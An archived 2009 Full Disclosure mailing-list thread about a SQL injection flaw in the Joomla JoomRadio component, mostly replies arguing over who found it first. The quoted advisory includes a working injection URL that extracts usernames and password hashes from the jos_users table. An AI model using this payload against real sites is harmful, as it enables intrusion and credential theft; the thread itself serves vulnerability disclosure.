Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Joomla Component com_joomradio SQL Injectionhas
From: infolookup () gmail com
Date: Thu, 19 Feb 2009 16:37:26 +0000

Has this been tested and verified this? 
Sent from my Verizon Wireless BlackBerry

-----Original Message-----
From: bobby.mugabe () hushmail com

Date: Thu, 19 Feb 2009 10:22:48 
To: <zeus.olimpusklan () gmail com>; <packet () packetstormsecurity org>
Cc: <bugtraq () zone-h org>; <full-disclosure () lists grok org uk>; <submit () milw0rm com>; <bugtraq () securityfocus 
com>
Subject: Re: [Full-disclosure] Joomla Component com_joomradio SQL Injection


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dear gov-boi,

Please follow the established etiquette of this list by linking to
content on archive.org to establish credibility for alleged
historic content.  Linking to obscure post-dated content on your
own Internet site, that easily can be faked, isn't the best way to
attempt legitimizing your darknet archival endeavours.  Many on
this list are sceptical about your claim regarding the previous
discovery of this important computer security issue, and to be
quite frank find your attempts to discredit the king of gods'
effort to secure this critical piece of Internet infrastructure
known as the joomla joomradio something-or-other.

Mr. Zeus - on behalf of my country I would like to express our
sincere thanks for reporting this severe issue, whether or not it
was previously and independently discovered and reported, and hope
you continue to contribute your research to this list of full
disclosure and helping to make the Internet a safer place for
everyone.

I would like to remind everyone that this list is for disclosure of
information security materials and that the fascist tactics used by
the packetstorm/#darknet crowd as they attempt to once again
monopolize the dissemination of information security materials is
not appreciated here.

All the best to you and yours,
- -bm


On Wed, 18 Feb 2009 17:21:10 -0500 Packet Storm
<packet () packetstormsecurity org> wrote:
Already discovered in June, 2008.

http://packetstormsecurity.org/0806-exploits/joomlajoomradio-
sql.txt bc9c589fca40fce9a4f4484333f207b5 The Joomla Joomradio
component version 1.0 suffers from a remote SQL injection
vulnerability.  Authored By <a
href="mailto:His0k4.hlm[at]gmail.com";>His0k4</a>

On Wed, Feb 18, 2009 at 07:32:02PM +0100, 0o_zeus_o0 wrote:

###################################################################
########
# Advisory X
# Title: Joomla Component com_joomradio SQL Injection
# Author: 0o_zeus_o0 ( Arturo Z. )
# Contact: arturo_zamora_c () hotmail com
# Website: www.securitybroken.com
# Date: 18/02/09
# Risk: Medium
# Vendor Url: http://ajaxportal.eu/
# Affected Software: JoomRadio
# autor script:author XrByte <info () exp ee>, Grusha
<grusha () feellove eu>

##################################################################
#
#Example:

##################################################################
#htp://

victimurl.com/pathjoomla/index.php?option=com_joomradio&page=show_r
adio&id=-1UNION
SELECT

user(),concat(username,0x3a,password),user(),user(),user(),user(),u
ser()
FROM jos_users--
#

##################################################################
#greetz:
#
# original advisorie: http://www.securitybroken.com

##################################################################

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQMCAAYFAkmdeSAACgkQhNp8gzZx3sjQnQP8DIyQpyqWn7ItQxusiG4RvifzrUq3
MyvT2uaVgD6bagNiQo2xpBlxjfAC91ikI18ahveZUX2t1NGwvXhgE7XN4TD531cAGXAU
e4D1z+rGmFqfthaDN73PgNr6kHme1TLPszzV7SxzCiZBPaIJZxVKPP0klhZW2Ma5pdOw
DXO/Xkw=
=bmhh
-----END PGP SIGNATURE-----

--
Find schools offering psychology programs online. 3 easy steps!
 http://tagline.hushmail.com/fc/BLSrjkqkOa4cAYuqAs2Rwg48EsDoRE7w8wplgXVKoZaAmTZ8jNnakTcdLkp/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]